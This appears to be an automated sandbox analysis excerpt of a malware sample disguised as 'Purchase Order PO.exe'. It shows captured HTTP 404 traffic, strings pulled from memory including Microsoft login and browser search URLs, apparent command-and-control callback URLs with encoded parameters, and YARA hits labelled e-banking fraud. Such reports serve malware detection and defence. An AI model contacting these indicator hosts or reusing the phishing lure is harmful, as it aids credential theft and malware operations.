6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 14:14:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 14:14:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 14:14:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 14:14:31 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Fri, 22 Nov 2024 14:14:38 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Fri, 22 Nov 2024 14:14:41 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Fri, 22 Nov 2024 14:14:44 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Fri, 22 Nov 2024 14:14:46 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 6d 34 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dm4p/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Fri, 22 Nov 2024 14:14:54 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Fri, 22 Nov 2024 14:14:57 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Fri, 22 Nov 2024 14:14:59 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Fri, 22 Nov 2024 14:15:02 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: QfgdvbjddZ.exe, 00000008.00000002.4170545877.0000000003948000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/6ou6/?o6=SpTPojpx7H&Mr60=We72k2U8RqyHNx9ftVgFe72GQMu4iuXnCau05KQMUjWmq73IzupFd
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: QfgdvbjddZ.exe, 00000008.00000002.4172302652.00000000056E1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartcongress.net
                Source: QfgdvbjddZ.exe, 00000008.00000002.4172302652.00000000056E1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartcongress.net/qtfx/
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Purchase Order PO.exeString found in binary or memory: https://github.com/ppx17/Onkyo-Remote-Control
                Source: isoburn.exe, 00000007.00000002.4169460570.0000000003049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: isoburn.exe, 00000007.00000002.4169460570.0000000003049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: isoburn.exe, 00000007.00000002.4169460570.0000000003049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: isoburn.exe, 00000007.00000002.4169460570.0000000003049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: isoburn.exe, 00000007.00000002.4169460570.0000000003049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: isoburn.exe, 00000007.00000002.4169460570.0000000003049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: isoburn.exe, 00000007.00000003.2318577280.0000000008146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: isoburn.exe, 00000007.00000002.4171236393.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000008.00000002.4170545877.00000000037B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cstrategy.online/qx5d/?Mr60=IyUQrkKyuirfHSYuUsN1
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.Purchase Order PO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Purchase Order PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
